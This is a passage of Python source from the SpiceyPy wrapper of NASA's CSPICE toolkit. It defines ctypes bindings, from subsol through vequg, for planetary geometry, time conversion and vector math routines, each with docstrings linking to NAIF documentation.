Determine the coordinates of the sub-solar point on a target
body as seen by a specified observer at a specified epoch,
optionally corrected for planetary (light time) and stellar
aberration.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/subsol_c.html
:param method: Computation method.
:type method: str
:param target: Name of target body.
:type target: str
:param et: Epoch in ephemeris seconds past J2000 TDB.
:type et: float
:param abcorr: Aberration correction.
:type abcorr: str
:param obsrvr: Name of observing body.
:type obsrvr: str
:return: Sub-solar point on the target body.
:rtype: 3-Element Array of floats
"""
method = stypes.stringToCharP(method)
target = stypes.stringToCharP(target)
et = ctypes.c_double(et)
abcorr = stypes.stringToCharP(abcorr)
obsrvr = stypes.stringToCharP(obsrvr)
spoint = stypes.emptyDoubleVector(3)
libspice.subsol_c(method, target, et, abcorr, obsrvr, spoint)
return stypes.cVectorToPython(spoint)
@spiceErrorCheck
def sumad(array):
"""
Return the sum of the elements of a double precision array.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sumad_c.html
:param array: Input Array.
:type array: Array of floats
:return: The sum of the array.
:rtype: float
"""
n = ctypes.c_int(len(array))
array = stypes.toDoubleVector(array)
return libspice.sumad_c(array, n)
@spiceErrorCheck
def sumai(array):
"""
Return the sum of the elements of an integer array.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sumai_c.html
:param array: Input Array.
:type array: Array of ints
:return: The sum of the array.
:rtype: int
"""
n = ctypes.c_int(len(array))
array = stypes.toIntVector(array)
return libspice.sumai_c(array, n)
@spiceErrorCheck
def surfnm(a, b, c, point):
"""
This routine computes the outward-pointing, unit normal vector
from a point on the surface of an ellipsoid.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/surfnm_c.html
:param a: Length of the ellisoid semi-axis along the x-axis.
:type a: float
:param b: Length of the ellisoid semi-axis along the y-axis.
:type b: float
:param c: Length of the ellisoid semi-axis along the z-axis.
:type c: float
:param point: Body-fixed coordinates of a point on the ellipsoid'
:type point: 3-Element Array of floats
:return: Outward pointing unit normal to ellipsoid at point.
:rtype: 3-Element Array of floats
"""
a = ctypes.c_double(a)
b = ctypes.c_double(b)
c = ctypes.c_double(c)
point = stypes.toDoubleVector(point)
normal = stypes.emptyDoubleVector(3)
libspice.surfnm_c(a, b, c, point, normal)
return stypes.cVectorToPython(normal)
@spiceErrorCheck
@spiceFoundExceptionThrower
def surfpt(positn, u, a, b, c):
"""
Determine the intersection of a line-of-sight vector with the
surface of an ellipsoid.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/surfpt_c.html
:param positn: Position of the observer in body-fixed frame.
:type positn: 3-Element Array of floats
:param u: Vector from the observer in some direction.
:type u: 3-Element Array of floats
:param a: Length of the ellisoid semi-axis along the x-axis.
:type a: float
:param b: Length of the ellisoid semi-axis along the y-axis.
:type b: float
:param c: Length of the ellisoid semi-axis along the z-axis.
:type c: float
:return: Point on the ellipsoid pointed to by u.
:rtype: 3-Element Array of floats
"""
a = ctypes.c_double(a)
b = ctypes.c_double(b)
c = ctypes.c_double(c)
positn = stypes.toDoubleVector(positn)
u = stypes.toDoubleVector(u)
point = stypes.emptyDoubleVector(3)
found = ctypes.c_int()
libspice.surfpt_c(positn, u, a, b, c, point, ctypes.byref(found))
return stypes.cVectorToPython(point), bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def surfpv(stvrtx, stdir, a, b, c):
"""
Find the state (position and velocity) of the surface intercept
defined by a specified ray, ray velocity, and ellipsoid.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/surfpv_c.html
:param stvrtx: State of ray's vertex.
:type stvrtx: 6-Element Array of floats
:param stdir: State of ray's direction vector.
:type stdir: 6-Element Array of floats
:param a: Length of the ellisoid semi-axis along the x-axis.
:type a: float
:param b: Length of the ellisoid semi-axis along the y-axis.
:type b: float
:param c: Length of the ellisoid semi-axis along the z-axis.
:type c: float
:return: State of surface intercept.
:rtype: list
"""
a = ctypes.c_double(a)
b = ctypes.c_double(b)
c = ctypes.c_double(c)
stvrtx = stypes.toDoubleVector(stvrtx)
stdir = stypes.toDoubleVector(stdir)
stx = stypes.emptyDoubleVector(6)
found = ctypes.c_int()
libspice.surfpv_c(stvrtx, stdir, a, b, c, stx, ctypes.byref(found))
return stypes.cVectorToPython(stx), bool(found.value)
@spiceErrorCheck
def swpool(agent, nnames, lenvals, names):
"""
Add a name to the list of agents to notify whenever a member of
a list of kernel variables is updated.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/swpool_c.html
:param agent: The name of an agent to be notified after updates.
:type agent: str
:param nnames: The number of variables to associate with agent.
:type nnames: int
:param lenvals: Length of strings in the names array.
:type lenvals: int
:param names: Variable names whose update causes the notice.
:type names: list of strs.
"""
agent = stypes.stringToCharP(agent)
nnames = ctypes.c_int(nnames)
lenvals = ctypes.c_int(lenvals)
names = stypes.listToCharArray(names)
libspice.swpool_c(agent, nnames, lenvals, names)
@spiceErrorCheck
def sxform(instring, tostring, et):
"""
Return the state transformation matrix from one frame to
another at a specified epoch.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/sxform_c.html
:param instring: Name of the frame to transform from.
:type instring: str
:param tostring: Name of the frame to transform to.
:type tostring: str
:param et: Epoch of the state transformation matrix.
:type et: Union[float,Iterable[float]]
:return: A state transformation matrix.
:rtype: 6x6-Element Array of floats
"""
instring = stypes.stringToCharP(instring)
tostring = stypes.stringToCharP(tostring)
xform = stypes.emptyDoubleMatrix(x=6, y=6)
if hasattr(et, "__iter__"):
xforms = []
for t in et:
libspice.sxform_c(instring, tostring, ctypes.c_double(t), xform)
checkForSpiceError(None)
xforms.append(stypes.cMatrixToNumpy(xform))
return xforms
else:
et = ctypes.c_double(et)
libspice.sxform_c(instring, tostring, et, xform)
return stypes.cMatrixToNumpy(xform)
@spiceErrorCheck
@spiceFoundExceptionThrower
def szpool(name):
"""
Return the kernel pool size limitations.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/szpool_c.html
:param name: Name of the parameter to be returned.
:type name: str
:return: Value of parameter specified by name,
:rtype: int
"""
name = stypes.stringToCharP(name)
n = ctypes.c_int()
found = ctypes.c_int(0)
libspice.szpool_c(name, ctypes.byref(n), ctypes.byref(found))
return n.value, bool(found.value)
################################################################################
# T
@spiceErrorCheck
def termpt(method, ilusrc, target, et, fixref, abcorr, corloc, obsrvr, refvec, rolstp,
ncuts, schstp, soltol, maxn):
"""
Find terminator points on a target body. The caller specifies
half-planes, bounded by the illumination source center-target center
vector, in which to search for terminator points.
The terminator can be either umbral or penumbral. The umbral
terminator is the boundary of the region on the target surface
where no light from the source is visible. The penumbral
terminator is the boundary of the region on the target surface
where none of the light from the source is blocked by the target
itself.
The surface of the target body may be represented either by a
triaxial ellipsoid or by topographic data.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/termpt_c.html
:param method: Computation method.
:type method: str
:param ilusrc: Illumination source.
:type ilusrc: str
:param target: Name of target body.
:type target: str
:param et: Epoch in ephemeris seconds past J2000 TDB.
:type et: float
:param fixref: Body-fixed, body-centered target body frame.
:type fixref: str
:param abcorr: Aberration correction.
:type abcorr: str
:param corloc: Aberration correction locus.
:type corloc: str
:param obsrvr: Name of observing body.
:type obsrvr: str
:param refvec: Reference vector for cutting half-planes.
:type refvec: 3-Element Array of floats
:param rolstp: Roll angular step for cutting half-planes.
:type rolstp: float
:param ncuts: Number of cutting half-planes.
:type ncuts: int
:param schstp: Angular step size for searching.
:type schstp: float
:param soltol: Solution convergence tolerance.
:type soltol: float
:param maxn: Maximum number of entries in output arrays.
:type maxn: int
:return: Counts of terminator points corresponding to cuts, Terminator points, Times associated with terminator points, Terminator vectors emanating from the observer
:rtype: tuple
"""
method = stypes.stringToCharP(method)
ilusrc = stypes.stringToCharP(ilusrc)
target = stypes.stringToCharP(target)
et = ctypes.c_double(et)
fixref = stypes.stringToCharP(fixref)
abcorr = stypes.stringToCharP(abcorr)
corloc = stypes.stringToCharP(corloc)
obsrvr = stypes.stringToCharP(obsrvr)
refvec = stypes.toDoubleVector(refvec)
rolstp = ctypes.c_double(rolstp)
ncuts = ctypes.c_int(ncuts)
schstp = ctypes.c_double(schstp)
soltol = ctypes.c_double(soltol)
maxn = ctypes.c_int(maxn)
npts = stypes.emptyIntVector(maxn.value)
points = stypes.emptyDoubleMatrix(3, maxn.value)
epochs = stypes.emptyDoubleVector(maxn)
trmvcs = stypes.emptyDoubleMatrix(3, maxn.value)
libspice.termpt_c(method, ilusrc, target, et, fixref,
abcorr, corloc, obsrvr, refvec,
rolstp, ncuts, schstp, soltol,
maxn, npts, points, epochs, trmvcs)
# Clip the empty elements out of returned results
npts = stypes.cVectorToPython(npts)
valid_points = numpy.where(npts >= 1)
return npts[valid_points], stypes.cMatrixToNumpy(points)[valid_points], \
stypes.cVectorToPython(epochs)[valid_points], \
stypes.cMatrixToNumpy(trmvcs)[valid_points]
@spiceErrorCheck
def timdef(action, item, lenout, value=None):
"""
Set and retrieve the defaults associated with calendar input strings.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/timdef_c.html
:param action: the kind of action to take "SET" or "GET".
:type action: str
:param item: the default item of interest.
:type item: str
:param lenout: the length of list for output.
:type lenout: int
:param value: the optional string used if action is "SET"
:type value: str
:return: the value associated with the default item.
:rtype: str
"""
action = stypes.stringToCharP(action)
item = stypes.stringToCharP(item)
lenout = ctypes.c_int(lenout)
if value is None:
value = stypes.stringToCharP(lenout)
else:
value = stypes.stringToCharP(value)
libspice.timdef_c(action, item, lenout, value)
return stypes.toPythonString(value)
@spiceErrorCheck
def timout(et, pictur, lenout=_default_len_out):
"""
This vectorized routine converts an input epoch represented in TDB seconds
past the TDB epoch of J2000 to a character string formatted to
the specifications of a user's format picture.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/timout_c.html
:param et: An epoch in seconds past the ephemeris epoch J2000.
:type et: Union[float,Iterable[float]]
:param pictur: A format specification for the output string.
:type pictur: str
:param lenout: The length of the output string plus 1.
:type lenout: int
:return: A string representation of the input epoch.
:rtype: str or array of str
"""
pictur = stypes.stringToCharP(pictur)
output = stypes.stringToCharP(lenout)
lenout = ctypes.c_int(lenout)
if hasattr(et, "__iter__"):
times = []
for t in et:
libspice.timout_c(ctypes.c_double(t), pictur, lenout, output)
checkForSpiceError(None)
times.append(stypes.toPythonString(output))
return times
else:
et = ctypes.c_double(et)
libspice.timout_c(et, pictur, lenout, output)
return stypes.toPythonString(output)
@spiceErrorCheck
def tipbod(ref, body, et):
"""
Return a 3x3 matrix that transforms positions in inertial
coordinates to positions in body-equator-and-prime-meridian
coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/tipbod_c.html
:param ref: ID of inertial reference frame to transform from.
:type ref: str
:param body: ID code of body.
:type body: int
:param et: Epoch of transformation.
:type et: float
:return: Transformation (position), inertial to prime meridian.
:rtype: 3x3-Element Array of floats
"""
ref = stypes.stringToCharP(ref)
body = ctypes.c_int(body)
et = ctypes.c_double(et)
retmatrix = stypes.emptyDoubleMatrix()
libspice.tipbod_c(ref, body, et, retmatrix)
return stypes.cMatrixToNumpy(retmatrix)
@spiceErrorCheck
def tisbod(ref, body, et):
"""
Return a 6x6 matrix that transforms states in inertial coordinates to
states in body-equator-and-prime-meridian coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/tisbod_c.html
:param ref: ID of inertial reference frame to transform from.
:type ref: str
:param body: ID code of body.
:type body: int
:param et: Epoch of transformation.
:type et: float
:return: Transformation (state), inertial to prime meridian.
:rtype: 6x6-Element Array of floats
"""
ref = stypes.stringToCharP(ref)
body = ctypes.c_int(body)
et = ctypes.c_double(et)
retmatrix = stypes.emptyDoubleMatrix(x=6, y=6)
libspice.tisbod_c(ref, body, et, retmatrix)
return stypes.cMatrixToNumpy(retmatrix)
# @spiceErrorCheck
def tkvrsn(item):
"""
Given an item such as the Toolkit or an entry point name, return
the latest version string.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/tkvrsn_c.html
:param item: Item for which a version string is desired.
:type item: str
:return: the latest version string.
:rtype: str
"""
item = stypes.stringToCharP(item)
return stypes.toPythonString(libspice.tkvrsn_c(item))
@spiceErrorCheck
def tparse(instring, lenout=_default_len_out):
"""
Parse a time string and return seconds past the J2000
epoch on a formal calendar.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/tparse_c.html
:param instring: Input time string, UTC.
:type instring: str
:param lenout: Available space in output error message string.
:type lenout: int
:return: Equivalent UTC seconds past J2000, Descriptive error message.
:rtype: tuple
"""
errmsg = stypes.stringToCharP(lenout)
lenout = ctypes.c_int(lenout)
instring = stypes.stringToCharP(instring)
sp2000 = ctypes.c_double()
libspice.tparse_c(instring, lenout, ctypes.byref(sp2000), errmsg)
return sp2000.value, stypes.toPythonString(errmsg)
@spiceErrorCheck
def tpictr(sample, lenout=_default_len_out, lenerr=_default_len_out):
"""
Given a sample time string, create a time format picture
suitable for use by the routine timout.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/tpictr_c.html
:param sample: A sample time string.
:type sample: str
:param lenout: The length for the output picture string.
:type lenout: int
:param lenerr: The length for the output error string.
:type lenerr: int
:return:
A format picture that describes sample,
Flag indicating whether sample parsed successfully,
Diagnostic returned if sample cannot be parsed
:rtype: tuple
"""
sample = stypes.stringToCharP(sample)
pictur = stypes.stringToCharP(lenout)
errmsg = stypes.stringToCharP(lenerr)
lenout = ctypes.c_int(lenout)
lenerr = ctypes.c_int(lenerr)
ok = ctypes.c_int()
libspice.tpictr_c(sample, lenout, lenerr, pictur, ctypes.byref(ok), errmsg)
return stypes.toPythonString(pictur), ok.value, stypes.toPythonString(
errmsg)
@spiceErrorCheck
def trace(matrix):
"""
Return the trace of a 3x3 matrix.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/trace_c.html
:param matrix: 3x3 matrix of double precision numbers.
:type matrix: 3x3-Element Array of floats
:return: The trace of matrix.
:rtype: float
"""
matrix = stypes.toDoubleMatrix(matrix)
return libspice.trace_c(matrix)
@spiceErrorCheck
def trcdep():
"""
Return the number of modules in the traceback representation.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/trcdep_c.html
:return: The number of modules in the traceback.
:rtype: int
"""
depth = ctypes.c_int()
libspice.trcdep_c(ctypes.byref(depth))
return depth.value
@spiceErrorCheck
def trcnam(index, namlen=_default_len_out):
"""
Return the name of the module having the specified position in
the trace representation. The first module to check in is at
index 0.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/trcnam_c.html
:param index: The position of the requested module name.
:type index: int
:param namlen: Available space in output name string.
:type namlen: int
:return: The name at position index in the traceback.
:rtype: str
"""
index = ctypes.c_int(index)
name = stypes.stringToCharP(namlen)
namlen = ctypes.c_int(namlen)
libspice.trcnam_c(index, namlen, name)
return stypes.toPythonString(name)
@spiceErrorCheck
def trcoff():
"""
Disable tracing.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/trcoff_c.html
"""
libspice.trcoff_c()
@spiceErrorCheck
def tsetyr(year):
"""
Set the lower bound on the 100 year range.
Default value is 1969
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/tsetyr_c.html
:param year: Lower bound on the 100 year interval of expansion
:type year: int
"""
year = ctypes.c_int(year)
libspice.tsetyr_c(year)
@spiceErrorCheck
def twopi():
"""
Return twice the value of pi
(the ratio of the circumference of a circle to its diameter).
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/twopi_c.html
:return: Twice the value of pi.
:rtype: float
"""
return libspice.twopi_c()
@spiceErrorCheck
def twovec(axdef, indexa, plndef, indexp):
"""
Find the transformation to the right-handed frame having a
given vector as a specified axis and having a second given
vector lying in a specified coordinate plane.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/twovec_c.html
:param axdef: Vector defining a principal axis.
:type axdef: 3-Element Array of floats
:param indexa: Principal axis number of axdef (X=1, Y=2, Z=3).
:type indexa: int
:param plndef: Vector defining (with axdef) a principal plane.
:type plndef: 3-Element Array of floats
:param indexp: Second axis number (with indexa) of principal plane.
:type indexp: int
:return: Output rotation matrix.
:rtype: 3x3-Element Array of floats
"""
axdef = stypes.toDoubleVector(axdef)
indexa = ctypes.c_int(indexa)
plndef = stypes.toDoubleVector(plndef)
indexp = ctypes.c_int(indexp)
mout = stypes.emptyDoubleMatrix()
libspice.twovec_c(axdef, indexa, plndef, indexp, mout)
return stypes.cMatrixToNumpy(mout)
@spiceErrorCheck
def txtopn(fname):
"""
Internal undocumented command for opening a new text file for
subsequent write access.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ftncls_c.html#Files
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ftncls_c.html#Examples
:param fname: name of the new text file to be opened.
:type fname: str
:return: FORTRAN logical unit of opened file
:rtype: int
"""
fnameP = stypes.stringToCharP(fname)
unit_out = ctypes.c_int()
fname_len = ctypes.c_int(len(fname))
libspice.txtopn_(fnameP, ctypes.byref(unit_out), fname_len)
return unit_out.value
@spiceErrorCheck
def tyear():
"""
Return the number of seconds in a tropical year.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/tyear_c.html
:return: The number of seconds in a tropical year.
:rtype: float
"""
return libspice.tyear_c()
################################################################################
# U
@spiceErrorCheck
def ucase(inchar, lenout=None):
"""
Convert the characters in a string to uppercase.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ucase_c.html
:param inchar: Input string.
:type inchar: str
:param lenout: Optional Maximum length of output string.
:type lenout: int
:return: Output string, all uppercase.
:rtype: str
"""
if lenout is None:
lenout = len(inchar) + 1
inchar = stypes.stringToCharP(inchar)
outchar = stypes.stringToCharP(" " * lenout)
lenout = ctypes.c_int(lenout)
libspice.ucase_c(inchar, lenout, outchar)
return stypes.toPythonString(outchar)
@spiceErrorCheck
def ucrss(v1, v2):
"""
Compute the normalized cross product of two 3-vectors.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ucrss_c.html
:param v1: Left vector for cross product.
:type v1: 3-Element Array of floats
:param v2: Right vector for cross product.
:type v2: 3-Element Array of floats
:return: Normalized cross product v1xv2 / abs(v1xv2).
:rtype: Array of floats
"""
v1 = stypes.toDoubleVector(v1)
v2 = stypes.toDoubleVector(v2)
vout = stypes.emptyDoubleVector(3)
libspice.ucrss_c(v1, v2, vout)
return stypes.cVectorToPython(vout)
def uddc(udfunc, x, dx):
"""
SPICE private routine intended solely for the support of SPICE
routines. Users should not call this routine directly due to the
volatile nature of this routine.
This routine calculates the derivative of 'udfunc' with respect
to time for 'et', then determines if the derivative has a
negative value.
Use the @spiceypy.utils.callbacks.SpiceUDFUNS dectorator to wrap
a given python function that takes one parameter (float) and
returns a float. For example::
@spiceypy.utils.callbacks.SpiceUDFUNS
def udfunc(et_in):
pos, new_et = spice.spkpos("MERCURY", et_in, "J2000", "LT+S", "MOON")
return new_et
deriv = spice.uddf(udfunc, et, 1.0)
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/uddc_c.html
:param udfunc: Name of the routine that computes the scalar value of interest.
:type udfunc: ctypes.CFunctionType
:param x: Independent variable of 'udfunc'.
:type x: float
:param dx: Interval from 'x' for derivative calculation.
:type dx: float
:return: Boolean indicating if the derivative is negative.
:rtype: bool
"""
x = ctypes.c_double(x)
dx = ctypes.c_double(dx)
isdescr = ctypes.c_int()
libspice.uddc_c(udfunc, x, dx, ctypes.byref(isdescr))
return bool(isdescr.value)
@spiceErrorCheck
def uddf(udfunc, x, dx):
"""
Routine to calculate the first derivative of a caller-specified
function using a three-point estimation.
Use the @spiceypy.utils.callbacks.SpiceUDFUNS dectorator to wrap
a given python function that takes one parameter (float) and
returns a float. For example::
@spiceypy.utils.callbacks.SpiceUDFUNS
def udfunc(et_in):
pos, new_et = spice.spkpos("MERCURY", et_in, "J2000", "LT+S", "MOON")
return new_et
deriv = spice.uddf(udfunc, et, 1.0)
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/uddf_c.html
:param udfunc: Name of the routine that computes the scalar value of interest.
:type udfunc: ctypes.CFunctionType
:param x: Independent variable of 'udfunc'.
:type x: float
:param dx: Interval from 'x' for derivative calculation.
:type dx: float
:return: Approximate derivative of 'udfunc' at 'x'
:rtype: float
"""
x = ctypes.c_double(x)
dx = ctypes.c_double(dx)
deriv = ctypes.c_double()
libspice.uddf_c(udfunc, x, dx, ctypes.byref(deriv))
return deriv.value
def udf(x):
"""
No-op routine for with an argument signature matching udfuns.
Allways returns 0.0 .
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/udf_c.html
:param x: Double precision value, unused.
:type x: float
:return: Double precision value, unused.
:rtype: float
"""
x = ctypes.c_double(x)
value = ctypes.c_double()
libspice.udf_c(x, ctypes.byref(value))
return value.value
@spiceErrorCheck
def union(a, b):
"""
Compute the union of two sets of any data type to form a third set.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/union_c.html
:param a: First input set.
:type a: spiceypy.utils.support_types.SpiceCell
:param b: Second input set.
:type b: spiceypy.utils.support_types.SpiceCell
:return: Union of a and b.
:rtype: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(a, stypes.SpiceCell)
assert isinstance(b, stypes.SpiceCell)
assert a.dtype == b.dtype
# Next line was redundant with [raise NotImpImplementedError] below
# assert a.dtype == 0 or a.dtype == 1 or a.dtype == 2
if a.dtype is 0:
c = stypes.SPICECHAR_CELL(max(a.size, b.size), max(a.length, b.length))
elif a.dtype is 1:
c = stypes.SPICEDOUBLE_CELL(max(a.size, b.size))
elif a.dtype is 2:
c = stypes.SPICEINT_CELL(max(a.size, b.size))
else:
raise NotImplementedError
libspice.union_c(ctypes.byref(a), ctypes.byref(b), ctypes.byref(c))
return c
@spiceErrorCheck
def unitim(epoch, insys, outsys):
"""
Transform time from one uniform scale to another. The uniform
time scales are TAI, TDT, TDB, ET, JED, JDTDB, JDTDT.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/unitim_c.html
:param epoch: An epoch to be converted.
:type epoch: float
:param insys: The time scale associated with the input epoch.
:type insys: str
:param outsys: The time scale associated with the function value.
:type outsys: str
:return:
The float in outsys that is equivalent
to the epoch on the insys time scale.
:rtype: float
"""
epoch = ctypes.c_double(epoch)
insys = stypes.stringToCharP(insys)
outsys = stypes.stringToCharP(outsys)
return libspice.unitim_c(epoch, insys, outsys)
@spiceErrorCheck
def unload(filename):
"""
Unload a SPICE kernel.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/unload_c.html
:param filename: The name of a kernel to unload.
:type filename: str
"""
if isinstance(filename, list):
for f in filename:
libspice.unload_c(stypes.stringToCharP(f))
return
filename = stypes.stringToCharP(filename)
libspice.unload_c(filename)
@spiceErrorCheck
def unorm(v1):
"""
Normalize a double precision 3-vector and return its magnitude.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/unorm_c.html
:param v1: Vector to be normalized.
:type v1: 3-Element Array of floats
:return: Unit vector of v1, Magnitude of v1.
:rtype: tuple
"""
v1 = stypes.toDoubleVector(v1)
vout = stypes.emptyDoubleVector(3)
vmag = ctypes.c_double()
libspice.unorm_c(v1, vout, ctypes.byref(vmag))
return stypes.cVectorToPython(vout), vmag.value
@spiceErrorCheck
def unormg(v1, ndim):
"""
Normalize a double precision vector of arbitrary dimension and
return its magnitude.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/unormg_c.html
:param v1: Vector to be normalized.
:type v1: Array of floats
:param ndim: This is the dimension of v1 and vout.
:type ndim: int
:return: Unit vector of v1, Magnitude of v1.
:rtype: tuple
"""
v1 = stypes.toDoubleVector(v1)
vout = stypes.emptyDoubleVector(ndim)
vmag = ctypes.c_double()
ndim = ctypes.c_int(ndim)
libspice.unormg_c(v1, ndim, vout, ctypes.byref(vmag))
return stypes.cVectorToPython(vout), vmag.value
@spiceErrorCheck
def utc2et(utcstr):
"""
Convert an input time from Calendar or Julian Date format, UTC,
to ephemeris seconds past J2000.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/utc2et_c.html
:param utcstr: Input time string, UTC.
:type utcstr: str
:return: Output epoch, ephemeris seconds past J2000.
:rtype: float
"""
utcstr = stypes.stringToCharP(utcstr)
et = ctypes.c_double()
libspice.utc2et_c(utcstr, ctypes.byref(et))
return et.value
################################################################################
# V
@spiceErrorCheck
def vadd(v1, v2):
""" Add two 3 dimensional vectors.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vadd_c.html
:param v1: First vector to be added.
:type v1: 3-Element Array of floats
:param v2: Second vector to be added.
:type v2: 3-Element Array of floats
:return: v1+v2
:rtype: 3-Element Array of floats
"""
v1 = stypes.toDoubleVector(v1)
v2 = stypes.toDoubleVector(v2)
vout = stypes.emptyDoubleVector(3)
libspice.vadd_c(v1, v2, vout)
return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vaddg(v1, v2, ndim):
""" Add two n-dimensional vectors
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vaddg_c.html
:param v1: First vector to be added.
:type v1: list[ndim]
:param v2: Second vector to be added.
:type v2: list[ndim]
:param ndim: Dimension of v1 and v2.
:type ndim: int
:return: v1+v2
:rtype: list[ndim]
"""
v1 = stypes.toDoubleVector(v1)
v2 = stypes.toDoubleVector(v2)
vout = stypes.emptyDoubleVector(ndim)
ndim = ctypes.c_int(ndim)
libspice.vaddg_c(v1, v2, ndim, vout)
return stypes.cVectorToPython(vout)
@spiceErrorCheck
def valid(insize, n, inset):
"""
Create a valid CSPICE set from a CSPICE Cell of any data type.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/valid_c.html
:param insize: Size (maximum cardinality) of the set.
:type insize: int
:param n: Initial no. of (possibly non-distinct) elements.
:type n: int
:param inset: Set to be validated.
:return: validated set
:rtype: spiceypy.utils.support_types.SpiceCell
"""
assert isinstance(inset, stypes.SpiceCell)
insize = ctypes.c_int(insize)
n = ctypes.c_int(n)
libspice.valid_c(insize, n, inset)
return inset
@spiceErrorCheck
def vcrss(v1, v2):
"""
Compute the cross product of two 3-dimensional vectors.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vcrss_c.html
:param v1: Left hand vector for cross product.
:type v1: 3-Element Array of floats
:param v2: Right hand vector for cross product.
:type v2: 3-Element Array of floats
:return: Cross product v1 x v2.
:rtype: 3-Element Array of floats
"""
v1 = stypes.toDoubleVector(v1)
v2 = stypes.toDoubleVector(v2)
vout = stypes.emptyDoubleVector(3)
libspice.vcrss_c(v1, v2, vout)
return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vdist(v1, v2):
"""
Return the distance between two three-dimensional vectors.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vdist_c.html
:param v1: First vector in the dot product.
:type v1: 3-Element Array of floats
:param v2: Second vector in the dot product.
:type v2: 3-Element Array of floats
:return: the distance between v1 and v2
:rtype: float
"""
v1 = stypes.toDoubleVector(v1)
v2 = stypes.toDoubleVector(v2)
return libspice.vdist_c(v1, v2)
@spiceErrorCheck
def vdistg(v1, v2, ndim):
"""
Return the distance between two vectors of arbitrary dimension.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vdistg_c.html
:param v1: ndim-dimensional double precision vector.
:type v1: list[ndim]
:param v2: ndim-dimensional double precision vector.
:type v2: list[ndim]
:param ndim: Dimension of v1 and v2.
:type ndim: int
:return: the distance between v1 and v2
:rtype: float
"""
v1 = stypes.toDoubleVector(v1)
v2 = stypes.toDoubleVector(v2)
ndim = ctypes.c_int(ndim)
return libspice.vdistg_c(v1, v2, ndim)
@spiceErrorCheck
def vdot(v1, v2):
"""
Compute the dot product of two double precision, 3-dimensional vectors.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vdot_c.html
:param v1: First vector in the dot product.
:type v1: 3-Element Array of floats
:param v2: Second vector in the dot product.
:type v2: 3-Element Array of floats
:return: dot product of v1 and v2.
:rtype: float
"""
v1 = stypes.toDoubleVector(v1)
v2 = stypes.toDoubleVector(v2)
return libspice.vdot_c(v1, v2)
@spiceErrorCheck
def vdotg(v1, v2, ndim):
"""
Compute the dot product of two double precision vectors of
arbitrary dimension.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vdotg_c.html
:param v1: First vector in the dot product.
:type v1: list[ndim]
:param v2: Second vector in the dot product.
:type v2: list[ndim]
:param ndim: Dimension of v1 and v2.
:type ndim: int
:return: dot product of v1 and v2.
:rtype: float
"""
v1 = stypes.toDoubleVector(v1)
v2 = stypes.toDoubleVector(v2)
ndim = ctypes.c_int(ndim)
return libspice.vdotg_c(v1, v2, ndim)
@spiceErrorCheck
def vequ(v1):
"""
Make one double precision 3-dimensional vector equal to another.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vequ_c.html
:param v1: 3-dimensional double precision vector.
:type v1: 3-Element Array of floats
:return: 3-dimensional double precision vector set equal to vin.
:rtype: 3-Element Array of floats
"""
v1 = stypes.toDoubleVector(v1)
vout = stypes.emptyDoubleVector(3)
libspice.vequ_c(v1, vout)
return stypes.cVectorToPython(vout)
@spiceErrorCheck
def vequg(v1, ndim):
"""
Make one double precision vector of arbitrary dimension equal to another.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/vequg_c.html
